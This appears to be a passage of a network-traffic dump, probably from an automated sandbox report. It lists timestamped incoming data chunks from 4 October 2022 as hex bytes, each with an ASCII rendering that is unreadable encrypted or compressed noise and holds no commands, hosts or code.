                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20728INData Raw: 58 af a9 07 94 31 12 bf c8 14 a3 02 c0 ab 82 c5 5e 1e ba 32 41 6b 1f b8 bb 9a d9 04 fc ee 87 67 d7 ee 99 ad a8 69 3d 76 b2 c9 6d c0 d5 f2 f6 e9 31 5a 98 66 f0 b7 d7 b1 91 94 5e f3 e6 85 52 aa e8 ef f6 34 48 6e 03 c7 c3 39 e4 e4 98 c6 d6 2e fb 56 72 84 9c 28 ef d2 ec 2f f4 58 bb 82 b8 06 e7 c5 c7 c3 10 ea 6d 46 58 09 be a3 4d 83 3a 7e ed 5f 58 c7 fa bc 5b 43 21 f0 9c 58 45 d0 31 b0 9b 0d e8 bd a7 75 6d 3a f4 d0 80 56 e1 6f 34 c5 01 37 e0 f1 44 0e 1b 9e fa c7 9d 70 e5 a8 1e a6 fc 35 d6 9f 49 a9 d3 c6 3d bd be 98 99 28 28 7d 92 71 a8 92 aa 14 09 98 94 72 13 87 ac e4 bb 6f 6b 8a 20 72 0c 0a d7 c1 df 37 b4 ed 12 75 9b 22 04 24 5d c8 ae 4d 36 2c 8a f1 15 d0 34 99 00 73 99 d0 b5 de a3 b8 ff 59 01 b4 cf 42 d6 41 57 fa a0 20 43 d2 fe f7 b8 6b 92 e4 bc 94 a9 6e 3b
                                                                                                                                                                                                                                    Data Ascii: X1^2Akgi=vm1Zf^R4Hn9.Vr(/XmFXM:~_X[C!XE1um:Vo47Dp5I=((}qrok r7u"$]M6,4sYBAW Ckn;
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20744INData Raw: 3c a9 14 ce e7 2d 9a 1f 76 3b b8 ed 53 4b c0 7b 11 c4 9a 89 c9 4a 80 67 02 57 d4 24 48 fc 2f f4 5c 94 13 3a 44 9c a9 6d b9 b8 91 d3 a2 49 ec be 1a 75 fd e1 15 04 97 f6 78 f1 f6 0d 34 a9 7e 0e a2 81 66 80 f2 bf 13 b8 87 b8 62 92 37 ee 57 f3 d9 f1 10 06 00 fc a3 5d 32 e5 57 0c 7b b7 a5 43 eb a9 e2 6e 07 c1 01 be 01 35 da 5a 6f 7c fe cd 29 d7 6f 14 04 47 21 ae 9e 33 77 dc fe b2 9c 38 f7 02 01 a9 9a 9a 5c 1d 87 14 a7 52 81 37 da 4f 40 0d 5f 92 1e 2d f4 db 59 09 6a 27 8f d2 90 f3 11 e1 b1 90 20 04 f1 d0 44 08 1d ce 6e ce da 1c 06 b2 c3 54 28 92 72 d5 93 7b 20 d8 d6 ae 14 e9 94 70 1a c1 af d4 e4 e5 92 77 92 96 f8 15 32 61 c9 7c c2 00 c4 40 79 29 42 aa 70 e4 07 89 cf 29 a2 12 d5 7d 24 28 c3 44 bd 82 6c ae 4f de 76 bc 47 55 5a 84 79 34 71 67 e1 91 62 bb cc 58 35
                                                                                                                                                                                                                                    Data Ascii: <-v;SK{JgW$H/\:DmIux4~fb7W]2W{Cn5Zo|)oG!3w8\R7O@_-Yj' DnT(r{ pw2a|@y)Bp)}$(DlOvGUZy4qgbX5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20760INData Raw: 58 31 a0 b9 77 02 1f 4c be 6c 7f 16 da 89 71 21 e7 8a 9f e3 17 b5 be 99 56 6d 18 3f ef e5 8d 68 fc ed f9 08 ee 89 b4 df 3c 14 e5 2d 89 9a dc 9c 2e 10 d9 f3 69 3c c6 50 bb 62 43 2a ca 18 fa e7 87 1c 5b a0 75 96 42 6f 20 48 22 ad 5b 73 3c dd 7a fa 1e f8 54 bc 44 44 4a ce 65 41 74 b0 a0 57 32 db 63 db 46 dd 07 03 32 db f5 c9 e9 cb 09 8d 18 c5 2a ae db c8 9e b9 44 b4 22 a5 bd 91 6d d4 9d db 3f aa 93 17 b9 84 3e 2a a3 64 26 2c 63 dc 76 b8 b1 77 8f c0 c2 75 55 36 e6 06 c2 52 bb 05 de 8b 2a 5a 6b 9e 07 89 fd 3a b6 e3 27 d0 95 6c 1f 67 e7 b8 38 14 b8 2e 4d f3 42 a5 df 50 4d 37 36 2e f3 c2 c1 8f b6 5f bd 19 30 00 39 c0 c9 c2 e5 d0 6d 21 e1 b5 d4 45 22 8c 79 98 34 f9 20 6a 15 a5 43 cc 47 f4 5f 6e 84 ef 9f fa 6f 99 9d ae 39 b9 a2 71 23 d6 5b 67 a2 07 dc 08 6f 10 96
                                                                                                                                                                                                                                    Data Ascii: X1wLlq!Vm?h<-.i<PbC*[uBo H"[s<zTDDJeAtW2cF2*D"m?>*d&,cvwuU6R*Zk:'lg8.MBPM76._09m!E"y4 jCG_no9q#[go
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20776INData Raw: cd 5c 8a 92 b8 27 e3 5f 0a 8c 1e 8e ca 16 68 e2 21 5d cf 38 5f 01 8f 29 5a ae f9 ea e3 66 69 4c 89 76 74 63 55 a4 4c 47 5d bf 46 28 8d 78 da 4f 98 3a 72 3a 22 6a 25 64 10 8f bc ea 5d 3d 9e 5f 61 73 2a 0d 90 a5 b5 bb 50 70 bc 89 a2 34 cb db 02 94 83 0c ce 18 1d 2e 28 d4 f1 ff 40 33 b9 8c df cf 35 b3 3d f0 c6 b2 3a d0 f2 93 9d c5 ee 67 b3 5a 4d c3 94 f3 c3 9f c3 f3 77 c2 cc be 68 a1 8b 6d c6 8e 20 78 38 93 d3 8c b7 39 de 18 13 07 de bc 5f 03 15 1c 68 dc 00 01 31 47 fa ab 49 03 ba ac 17 92 10 94 78 36 69 19 b6 99 5f f4 5d 36 6e cf 38 34 0e d1 2f 96 28 cf ec 16 ea 89 57 83 24 60 1c 9c e6 dd 5a d0 44 81 09 43 b7 6f ec 36 d4 fa 8d f9 4d 83 5b 1c ba 51 1b 7d 90 0b 93 53 44 12 a0 62 e9 c1 1b dd 7b 2e f5 d4 25 45 e6 f7 ed 4d 89 6a 86 cc 03 85 37 88 53 13 6d de 10
                                                                                                                                                                                                                                    Data Ascii: \'_h!]8_)ZfiLvtcULG]F(xO:r:"j%d]=_as*Pp4.(@35=:gZMwhm x89_h1GIx6i_]6n84/(W$`ZDCo6M[Q}SDb{.%EMj7Sm
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20792INData Raw: 68 d7 69 46 72 e8 59 9a 47 8e 04 0f 5e 58 70 b9 76 78 20 24 a2 7c 05 20 9e 6c 51 b6 31 d0 bd c4 86 d3 bf c4 3f b1 a8 51 ee 6b 10 8b e4 22 2c 58 52 57 f7 bd d3 e6 d8 79 57 83 91 ca 9b 28 9c 76 4d 72 c3 c3 70 a4 d7 8c bf 31 5c 30 1d e9 2f 99 35 5d bc 52 8a b9 a4 19 84 7b 45 fd 04 1a 92 1c 41 9e b5 e8 f9 c6 af 6e 12 36 60 dc 9e ba ad ba e5 0e 1d 05 c0 de 18 a1 ae a9 04 96 c1 92 3e 1b bf e5 b6 60 ae 95 ac 52 3e 64 b4 af 37 bf 7f 21 dc c2 c8 e7 ca b7 8a fd 59 39 f6 4d 9e 49 64 0a 1a 95 93 fc ed 7e 19 50 0b fe ce 02 d0 89 68 4f 07 e0 85 51 63 6f ad 3f fd 0d b1 33 a1 26 4e 71 06 66 7b 12 49 bd d4 f9 ac 7f 5c 4b 8c ff ea 80 c9 e6 09 be 95 55 6e 93 74 55 68 45 30 d9 61 a4 95 dd 1c a8 0d 2b f5 ea 62 c5 ad a9 84 fe 41 1c 06 48 4b 16 4a c7 e0 41 55 5b 51 48 56 50 2c
                                                                                                                                                                                                                                    Data Ascii: hiFrYG^Xpvx $| lQ1?Qk",XRWyW(vMrp1\0/5]R{EAn6`>`R>d7!Y9MId~PhOQco?3&Nqf{I\KUntUhE0a+bAHKJAU[QHVP,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20808INData Raw: a6 3a 0a 3e fc c8 02 cf b7 18 43 be d2 ba c7 ef 9b 2c 71 ee bf 85 5d d1 30 3f 16 6e 78 60 11 c8 6c 7e af 1b c2 e7 54 5f cb 1b d9 a4 f0 b7 e5 d7 7c 68 cd d3 6b 4d 58 a1 26 15 38 92 57 d4 89 21 7e 95 bd a0 53 b2 b5 87 66 ab 55 2d 35 0b 7b 95 49 fa 12 4e 82 50 03 a2 c1 5d 0b 3d d0 fd 88 07 29 d1 e4 9b fd 3c 86 e5 2a e1 6d 9f 4e 48 d8 9a c5 88 3f 3c b2 65 7c cc f3 3a 5d e0 b6 fc 06 af 35 aa e3 99 71 db ee 00 a2 c7 f5 4c d8 02 4b 90 54 df 44 0c 1d 19 82 01 c8 6a 83 88 0e b7 43 00 4f e4 fb 2c 52 8b 01 35 b1 d3 21 f6 f8 a6 19 32 b8 b1 26 5f 7e 7b eb cb 78 2f 9a 7d d8 1a dd b3 3c 48 cd 43 b5 b8 e9 90 c7 7c 6c db b6 b5 fc b2 ef 60 bf 8b c2 af 99 57 80 2e 3c 0a 34 b5 73 23 58 20 5a b5 8d ee b6 9f a7 ef c2 84 36 2e 6e b7 61 bf 77 be 51 36 c8 22 70 65 57 97 3e 43 7f
                                                                                                                                                                                                                                    Data Ascii: :>C,q]0?nx`l~T_|hkMX&8W!~SfU-5{INP]=)<*mNH?<e|:]5qLKTDjCO,R5!2&_~{x/}<HC|l`W.<4s#X Z6.nawQ6"peW>C
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20824INData Raw: 14 32 a2 55 55 c0 94 fc 4b fd fb fc 79 93 66 6e c0 2a 7b 70 fd 75 01 de f0 84 98 ac c5 b2 ce 7a 4a 9c b6 81 68 86 ad 69 c0 5f 42 ef e2 6b f0 67 37 dc 08 cd f5 6b cb d6 01 d1 0e 77 30 4f 2b 5f 35 0a 02 47 c6 1a 70 27 25 38 f4 90 8d 1d 58 1e 64 66 fe 52 d3 93 8f b9 9e f7 f6 85 3a 04 31 53 51 6b f1 8a da 9d 8d e9 92 d4 8c 23 40 08 e2 a0 f0 47 04 06 80 df 73 5b f8 16 13 5e da 4a b0 98 b8 01 45 35 77 10 3c 15 75 ab 20 87 31 18 89 58 c6 de 58 4e 9c 25 fa db a0 99 4f 1d 2a 8b bb cd 63 36 b1 b4 19 23 80 1a eb 9c 8c 0e 70 02 cd d4 10 03 75 03 68 3d 62 da d4 a0 03 c6 3b fd d0 c7 0e 95 db c8 3a cd d0 65 5e 89 27 69 31 2d 8b 23 d5 85 de 80 8d 32 08 10 f8 4e 0c bb 15 c7 fe 5f 72 57 f7 93 c3 d7 5f 27 dc 2f da 2d 68 a8 3c 7a 35 f7 44 26 79 b5 7e 18 e9 12 4b fa 66 8c 69
                                                                                                                                                                                                                                    Data Ascii: 2UUKyfn*{puzJhi_Bkg7kw0O+_5Gp'%8XdfR:1SQk#@Gs[^JE5w<u 1XXN%O*c6#puh=b;:e^'i1-#2N_rW_'/-h<z5D&y~Kfi
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20840INData Raw: 00 2a 8d 7a eb 13 b2 f0 0f 08 2d 5a f8 8d 2b 78 48 f3 33 45 80 5c 72 b4 82 3a 4f 3e c3 82 89 0f 79 ad 75 84 2b 81 75 95 ac 09 b4 e4 99 b4 39 68 80 c0 09 a1 81 22 2e 9e 7c 7a b3 83 ab 7c 94 6b 6a 98 85 5b 67 53 86 73 6b 86 fe e5 56 33 2c 52 48 67 38 c3 10 e8 d9 34 8d aa c7 26 14 46 8b fa 42 ce 4f e2 b3 61 f4 56 8a 68 e6 a8 73 a0 0e c4 90 b6 35 30 d9 6e 8e 0d 85 ff 39 1b 93 26 3c 4e 12 bc f7 d0 50 48 e9 ee 14 af 9f 28 e7 ac 50 7b 0c 1e 1e 1a ea 83 ad e4 0f 1c e3 e6 7b ee 37 ee d0 f9 ef 2c db 31 ed 30 20 7b 78 e8 68 fe e8 8d e5 0b b9 49 a6 7d 19 10 18 eb 83 39 c3 22 f5 5a 6f b3 95 54 f8 16 9f 59 91 aa 90 5a 31 97 dc d5 f5 0d 74 39 cb dd 48 46 ff f9 48 3a 4a 2e a6 ae 97 af 36 7e a5 46 76 55 4d 2e 93 9f 21 40 f7 22 3c 05 d6 8f 42 c4 12 93 8c 1a f6 24 5c 6f 8b
                                                                                                                                                                                                                                    Data Ascii: *z-Z+xH3E\r:O>yu+u9h".|z|kj[gSskV3,RHg84&FBOaVhs50n9&<NPH(P{{7,10 {xhI}9"ZoTYZ1t9HFH:J.6~FvUM.!@"<B$\o
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20856INData Raw: 4e 0e 3d 3f 1d 89 2e 43 39 6a 36 b6 a9 b0 9f 4f 4c f1 26 45 4b a6 90 c5 d7 7b 71 0b 5b b9 de d2 0a 51 fd 3c f0 24 6f 7e db b6 2e aa 9d 94 5a 72 88 d9 b5 02 83 e9 2a 60 50 b7 17 c9 83 c4 50 b5 68 22 3b 08 3a c1 a6 19 cb 8e 3a 6b 6d d5 a4 e8 52 4d 06 a7 ca 62 c1 95 4e 2e aa 46 f3 0f 28 e1 62 7e 5c 41 08 1c d1 7f 9f cf f3 f9 02 90 f0 65 1d 93 1c 20 c5 e6 14 90 96 1b 61 d5 60 57 e4 01 67 ed ac e6 69 ce 7c 21 fa 6b cc 9b f2 ff f2 b2 7e 87 b4 7f fc b9 a8 0c a7 fd 05 f5 2f 94 b7 eb 4e 71 d1 9f 9e 86 84 5b 31 e4 88 ee e9 4a 41 3c 9b 97 9b 70 96 38 20 1c 27 b6 c9 68 08 f2 39 89 c1 87 12 c2 77 79 fd 56 74 b0 3b 7b 88 40 0b 4e ba b5 0b 09 0e fb 86 7d 2b 70 b6 5a 5c 6a 06 5f 75 4b 32 d6 5d d2 39 a8 89 46 07 54 ea d5 d5 db 62 d2 eb be 9f 75 8b e9 6d e7 cb 3a 6a 81 b0
                                                                                                                                                                                                                                    Data Ascii: N=?.C9j6OL&EK{q[Q<$o~.Zr*`PPh";::kmRMbN.F(b~\Ae a`Wgi|!k~/Nq[1JA<p8 'h9wyVt;{@N}+pZ\j_uK2]9FTbum:j
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20872INData Raw: ee 61 45 0a 96 11 9b 39 9f db 33 ec 5f 42 36 a6 47 16 d5 9b e1 3e 6a 5f 4e 6b f5 06 72 6b 35 11 4b 96 3c 1d 85 ea 1f 96 a7 a2 c8 5d b7 64 0f 55 44 cf a4 41 b2 06 cd 23 dd 25 54 df 06 52 ef 37 87 74 53 7b 99 19 37 77 1b 30 01 54 99 57 20 47 f1 be 97 bc 42 a8 ab ab 7c 25 c6 4b 3e 46 67 fd b2 03 a8 f1 96 84 9d e5 5b d4 19 6b 72 d7 bc 87 ff e9 b6 46 44 27 8b 81 2e 21 ff dd 5b 9f e9 a4 91 fc 97 69 2d 5f 64 40 9c 9a 74 b3 a8 ca 8e 3c 8c 05 4d f0 72 2b 28 a3 df 85 a9 25 aa 1b ef e6 79 21 2b f8 51 b5 91 d4 7e 22 a2 b4 50 c7 0c 6f ef e7 bc 7a f6 0b 9f 67 70 20 8d 80 49 37 f2 d3 48 ca 1c b3 77 f3 1c 7e 34 1b 66 41 84 0d 32 97 d0 93 85 f7 42 0e 60 3c a2 a0 1e 56 57 27 68 da 93 2b 2b ff cd a0 da 04 df 83 c1 aa dc b8 48 2c f6 28 49 2e aa 8c 79 60 71 7f 2e 03 3f b6 32
                                                                                                                                                                                                                                    Data Ascii: aE93_B6G>j_Nkrk5K<]dUDA#%TR7tS{7w0TW GB|%K>Fg[krFD'.![i-_d@t<Mr+(%y!+Q~"Pozgp I7Hw~4fA2B`<VW'h++H,(I.y`q.?2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20888INData Raw: cc 8c 1e 15 bb 0f de 94 c1 56 a8 58 9e 0e 84 cc 0f 5d c1 76 b6 bd 9f ab 86 32 95 ed a1 fa 4c 7d 85 a8 fb 1f 65 8e 5d af fe 74 62 b7 47 37 9e d7 e4 d3 73 a2 f2 fa 58 79 54 2e d3 b0 d2 5d 61 a9 79 e1 b0 b1 80 9f 51 27 64 08 a7 15 1d 5c 22 7b 84 23 68 eb cd c6 d4 38 6c f1 17 a4 05 86 c9 d1 cb 22 49 e3 1b ed 5e c9 73 71 9f 1b c7 75 a6 56 73 22 46 fe fe 3a 73 77 55 18 f0 c9 b3 14 22 2d 3b 52 a1 f4 14 b3 36 7c 7d 10 3e 12 2e 25 d9 5e 46 be b5 b3 80 3f d4 83 2a 7b 4f 5e 63 f0 1a 54 e5 ef f6 32 3f 1f 02 6c cf 2a bb c2 2c 6e 24 43 be 36 92 23 c9 9e d9 9c 21 39 9e be f5 7a 88 1b c7 6f 6c 32 c5 d4 cd ea a8 4f 71 1d ec 45 1d f0 8b 8f 19 ce 2f 6e 39 fb 11 1c ae c4 dc f1 b8 21 20 15 2d c9 91 0a 4d dc d8 4f 8b f1 ed 35 51 44 c0 5b bc 6f 10 d9 1d 5e ce cd 4d 94 3a 4e c0
                                                                                                                                                                                                                                    Data Ascii: VX]v2L}e]tbG7sXyT.]ayQ'd\"{#h8l"I^squVs"F:swU"-;R6|}>.%^F?*{O^cT2?l*,n$C6#!9zol2OqE/n9! -MO5QD[o^M:N
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20904INData Raw: 51 a9 2a 6d 53 47 ee fb 7a 28 bd 63 c7 8f 05 95 cc e7 f3 f4 ce c1 25 e2 65 ce e6 f1 05 ad 81 8f 8e 12 28 c7 67 ef b1 96 75 61 a0 82 b9 1d a8 e6 5c ad 8a 69 fd a6 7d 27 de 4f 88 69 8f 11 4c 8e da 2c 3c 6d bd 80 d6 bd 0f 4d 43 6e e7 8c fc ed 34 a0 5a 9b f1 78 46 12 61 68 a3 79 07 75 3b 64 80 7b 0a 68 78 af 93 9d a1 77 5a f7 2d 03 42 b7 a1 b5 ab 9f c4 bb 7e ba 2e cb 1e bc 0d 4f b3 8f 96 45 ed 51 0a 7d bc 87 ae ea 2f e7 d2 1d af 6a a3 d5 4d 25 d7 67 3f 0d 5e 3a 1c 69 3d d5 91 34 77 a3 be 36 f5 f8 4b 8c 2c 86 cb b1 8c 68 74 e0 48 38 1e 7d 73 d2 c4 b1 2f 8c 77 3e 8b 6a b4 e2 de ef d6 d7 0e 7b b5 b1 66 c1 30 37 db 3b ce 26 3b 48 68 5e a0 e3 1d 18 98 9e 1a 5f 07 2b ef bf 05 c3 9b 15 d6 51 6e 1e d0 12 1c 47 6b f5 3a e3 8e 58 7e 98 52 e0 bb 5a fd 1b 6c 1c 72 b3 a7
                                                                                                                                                                                                                                    Data Ascii: Q*mSGz(c%e(gua\i}'OiL,<mMCn4ZxFahyu;d{hxwZ-B~.OEQ}/jM%g?^:i=4w6K,htH8}s/w>j{f07;&;Hh^_+QnGk:X~RZlr
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20920INData Raw: a7 eb d0 62 26 43 75 e6 e6 c6 36 91 56 9e d1 33 5b 49 be f1 04 10 c9 a2 ed 89 26 94 f7 91 bf 41 68 da 62 f8 38 48 46 1b 2d be c3 45 60 4d f7 ec de ee 5d f1 bc 48 c1 99 f1 0e 01 79 63 f3 5b 7c 2c ba ff ae 27 2c b4 b8 64 9a 42 7f 3e ba 8c 41 dd 5b ff 30 88 85 9f dd 79 e1 79 ce 94 a6 b0 1f c0 46 93 a0 5c b8 1b e2 91 8a a7 1d dd f1 af b3 5e 3c e6 9d 28 32 29 3d 7a ad ce 34 c9 2c 5a f6 d8 48 a3 ef 93 74 49 8f a4 52 45 29 c5 50 4f 3f f7 09 6f 8b e0 f7 5b a1 42 51 52 e3 da 31 0c f7 8b 76 52 22 9b e1 5f d7 af 82 f3 ef c0 89 73 cd 27 15 65 74 24 99 32 b5 68 8c e7 ea fa e7 db 05 bd 61 14 94 ee 81 0a c7 58 74 3d 57 b3 db c3 5d 3d f7 91 9a ba ed 97 75 31 6e a7 6f 15 d7 1a db c0 cd 1c cf b9 db ff bf 77 e7 2f 8a 68 13 3e bb 32 dd e8 2d 0b 73 68 15 95 73 1a b3 f8 cf bf
                                                                                                                                                                                                                                    Data Ascii: b&Cu6V3[I&Ahb8HF-E`M]Hyc[|,',dB>A[0yyF\^<(2)=z4,ZHtIRE)PO?o[BQR1vR"_s'et$2haXt=W]=u1now/h>2-shs
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20936INData Raw: f1 af 82 98 01 e1 ec 30 6c 58 41 f0 7f bf 1b f8 5b 25 46 78 74 af 92 44 c6 f4 f6 8f 16 84 9b 6d af d0 d4 dd e3 cc 72 18 f3 bb bf e2 b0 76 df 55 76 93 54 6c 63 a3 a7 f5 99 0a a2 5e 72 84 10 7e 89 ab 99 7b 8a 5e 87 f9 90 ef 29 1f 10 67 45 db 58 57 2e ab a7 c3 00 70 d1 15 44 35 56 23 c0 33 ad 8f 37 ab d3 f6 b3 22 7c 4d 12 c2 4f 15 64 66 e3 1c 5b 89 30 53 62 28 3d 73 6e 0e f5 79 25 06 3b 5f b3 63 f3 e5 96 f8 0c e3 bf 44 6f 87 fb 2d 39 ed 71 cb 64 a9 5e de 30 66 52 51 6b ed 53 98 b2 59 0e 82 25 0d 6e 3c df 31 c1 87 ef e6 56 28 6a 16 04 72 b7 80 bb 6a d7 d5 ba b2 26 31 a5 c6 9e 4d 13 67 07 5f 95 53 2c c7 d5 66 87 20 fc 90 3e c8 5c 89 ef 7b 7a 39 37 31 ee 87 6b 55 bb 6b a9 b7 ea 8e a3 01 1c da 6c 99 43 a8 e3 c1 06 3d cb 83 cb 95 d3 d6 3e e3 d0 2e 84 ec 26 2b 05
                                                                                                                                                                                                                                    Data Ascii: 0lXA[%FxtDmrvUvTlc^r~{^)gEXW.pD5V#37"|MOdf[0Sb(=sny%;_cDo-9qd^0fRQkSY%n<1V(jrj&1Mg_S,f >\{z971kUklC=>.&+
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20952INData Raw: ae fe 18 ad cc 18 b3 40 d7 5e d3 49 b5 ae d9 81 aa 71 68 e8 94 af df 21 99 32 ac 38 87 7c 19 61 58 09 9c a6 69 de 1a 17 69 d8 96 78 ab ae 37 49 29 cf a6 70 b4 81 15 d9 5c 1e 57 22 f5 4e 05 b1 d0 fe b5 25 49 0a 3a 35 10 e9 f4 e8 e2 32 6a d9 86 ce d3 28 22 60 e9 be 0b 1b f5 3d 79 7c e0 dd 98 68 15 a0 f5 37 23 04 6f 61 1f 40 b4 98 2b 44 fe 73 a8 33 8a c0 f8 75 4d ba be a6 4f 19 22 c1 6b bd f7 b3 01 fb 2a 5f b1 9b f8 59 72 77 f3 bf 1e 81 b2 8e f0 7d e9 ee a5 f7 58 b8 18 73 7d 14 f2 04 dc ec 7e 83 0d b8 fc 91 12 b0 90 8f b2 38 ae b6 d2 32 66 41 d0 f6 13 6b 22 7b 5c 44 27 69 fa d3 83 45 b4 81 0d b3 b9 b5 c6 98 66 f4 a5 16 6a 54 71 e8 61 ea bf 7b fc 9e b1 d0 c3 42 4e e5 d2 ce 06 7e 4f 80 d7 32 b4 e7 a9 f9 0a 5e f0 d4 52 46 25 0b c7 8f 96 0d db 60 dc d3 ee af 10
                                                                                                                                                                                                                                    Data Ascii: @^Iqh!28|aXiix7I)p\W"N%I:52j("`=y|h7#oa@+Ds3uMO"k*_Yrw}Xs}~82fAk"{\D'iEfjTqa{BN~O2^RF%`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20968INData Raw: f5 bc f6 bb d4 92 cc ff 5f 4e e8 56 47 4d 99 81 d1 d8 0b 2d 23 c7 99 83 26 5b ae 4c 5e 8c 3f 7c b2 56 57 ff d7 6d d8 1b 38 db bb 80 bd fa d2 93 fa cd 9a cf ec 41 39 2b b9 23 84 33 64 37 ae 79 1e c7 1d ba 9f 50 b6 89 3d 6f fc 46 b7 41 88 c5 9d a4 7f a9 ca 0e e1 1e f8 24 91 4c 92 ab a0 94 da 19 6c 05 89 47 60 96 da a0 4c f7 39 9f 0b 8d e4 5d ca e4 35 5a f0 b7 5d 7a f8 8f df 4c 81 a5 75 e4 0a fb 4c 2b 35 11 f3 7a 00 94 4e e9 e1 f7 36 a3 42 27 60 82 ab 36 e9 2f 11 b0 52 d4 64 f8 02 8e 8b 10 fa 4c 84 6e 66 44 5a a6 f5 c9 f3 d9 f1 b2 b8 a1 7c 18 7d 07 cd 6a 1e 1e 50 ab 01 fd ee c9 10 a4 9f ef 8e 2c db 51 54 a2 2c 41 c2 98 7e 28 26 be 29 15 f0 32 f6 a8 7d 6a 4f 70 ed e7 14 80 8f 43 32 11 4d 12 f6 64 e4 f5 d6 45 65 77 e8 df 43 47 49 5f 95 80 ac 42 7d aa d7 d4 55
                                                                                                                                                                                                                                    Data Ascii: _NVGM-#&[L^?|VWm8A9+#3d7yP=oFA$LlG`L9]5Z]zLuL+5zN6B'`6/RdLnfDZ|}jP,QT,A~(&)2}jOpC2MdEewCGI_B}U
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20984INData Raw: 79 3a 24 df 39 85 42 00 8f b1 ee 65 d6 aa 90 b8 a3 5d 26 6c f9 f1 0f 13 61 70 8c 66 1f 31 f1 cd d9 aa 18 05 75 19 cb 43 e2 49 e8 b4 8b e0 3e 85 36 98 4a 2e cc 5c 2f 93 bb 16 f4 e8 05 2a ac 19 18 d6 62 26 6e 8c bf 9d 3c a8 8e 3c e1 64 14 b8 c9 ca 05 0f 45 79 df 5f bb df 95 4f 2b d5 95 b3 88 29 59 05 99 6f e3 75 1e 22 ef 6f d1 67 57 df 93 88 74 d8 af 8a df 5a de 4d 2b a0 8b 94 31 ec 78 41 ae 1e 38 3c 94 87 5b 72 79 17 59 2e df e4 dc 57 02 75 34 94 30 78 c8 ea 87 bd 43 6c f0 ac 5d 3a 25 c3 6c 15 5c 4d e4 0c 13 a0 0e 34 46 cc ed ec 72 a9 bd fe df d9 b8 00 2e 18 59 02 d1 c9 83 e1 d1 7a 66 92 9b 69 99 58 7a 5c 42 f8 ab ed a1 dd 88 ce 35 3d 7e 14 76 a6 89 66 ab 27 6e 97 b1 08 cf db 7a d0 47 43 21 d3 31 34 62 0e 97 fe ea 7a 37 a3 f4 d1 bd 66 c9 56 37 3a ef 64 3a
                                                                                                                                                                                                                                    Data Ascii: y:$9Be]&lapf1uCI>6J.\/*b&n<<dEy_O+)You"ogWtZM+1xA8<[ryY.Wu40xCl]:%l\M4Fr.YzfiXz\B5=~vf'nzGC!14bz7fV7:d:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21000INData Raw: ef 51 2b 23 10 b7 67 71 2c 73 38 e1 24 8e f2 14 fe 90 fc ff ae fc cc 5e 3c 6e 31 0f 36 cc 9a 1a 23 11 bd 8f 0f f0 24 89 6e 05 40 59 61 03 ad cf 16 4e 3b ea f6 26 78 d8 ba 77 10 f1 07 1b 97 25 93 fc 60 3d 9e 16 e3 36 05 32 aa 36 d8 ba 19 72 c9 b9 7f 11 f1 44 de 11 87 05 d3 2e 33 9b cd fc 28 5b fe 66 c4 6c 33 4c cd e3 dc 30 47 07 4d 88 61 bc 57 93 e2 14 a3 9d dc ea ff 76 92 15 da 0f 2f af 18 a9 6a d7 0f ca 08 ff 6b 0c 0b 0e c3 e3 06 29 db f4 f2 7f 05 7e 7d db 88 72 ec ec a6 23 d6 21 14 87 17 16 41 f0 f1 ba b7 48 38 b5 5f 67 b8 49 37 e2 7d 83 df 95 fa bd c5 a8 cd 24 fd cc 6d 65 2b 73 fc a8 94 ee aa 9a c1 f8 32 35 ad a7 c5 ca bf 49 d3 07 c7 2e b6 d6 e9 62 95 ad 3e 16 2c a9 df 06 fb d7 c8 88 97 d3 7a 09 a9 d5 4c 02 0d 3d b5 f1 e6 b0 77 b1 55 da c9 91 88 5a 67
                                                                                                                                                                                                                                    Data Ascii: Q+#gq,s8$^<n16#$n@YaN;&xw%`=626rD.3([fl3L0GMaWv/jk)~}r#!AH8_gI7}$me+s25I.b>,zL=wUZg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21016INData Raw: 89 37 d3 17 c0 0f a6 36 ae 50 1b b6 54 59 d0 2a 11 fa a7 66 07 d3 d2 8f 33 a5 da a2 f1 25 7f 63 82 bc fc 9a fe 5f ba 24 0b 46 00 80 5d f9 51 32 09 ca c2 41 15 69 29 16 fc 13 a4 ad 9c a3 87 7e 78 ac cf 41 2c a7 5f b4 f9 0c 5e 0d 54 6c 3a 02 3d 13 ac 6e 2f 20 77 74 d7 9b 06 ec 6d 46 e9 a5 e4 9b 44 f5 56 ee 13 48 bd 25 03 93 33 69 98 93 bd 6d 5a 0e 43 60 5d a9 f8 e3 d6 64 6c 98 a6 9b de 25 24 f7 ed eb f9 bb bc 0f 4c 5e 19 78 9c 2c 8d c4 0c 57 fb 91 2f e3 53 b4 3e ad 96 4f ef d2 1e c3 f5 6e b3 07 1e 9a 32 73 5d 7a 24 45 b3 67 79 1d 03 b3 a1 8f 19 b3 1b 29 53 bf a6 9d 0e 04 df 44 96 4c b6 db 0e 72 3d 58 54 3e 10 96 f0 fc 62 f5 b1 3a 79 80 15 f7 cb 9d fc fa 2e 9a 76 d6 cd 66 20 d3 b9 db 90 95 e1 1a 79 59 da e6 c3 11 21 e7 fe dd ed 12 89 e9 e2 15 3e b9 b4 3c be
                                                                                                                                                                                                                                    Data Ascii: 76PTY*f3%c_$F]Q2Ai)~xA,_^Tl:=n/ wtmFDVH%3imZC`]dl%$L^x,W/S>On2s]z$Egy)SDLr=XT>b:y.vf yY!><
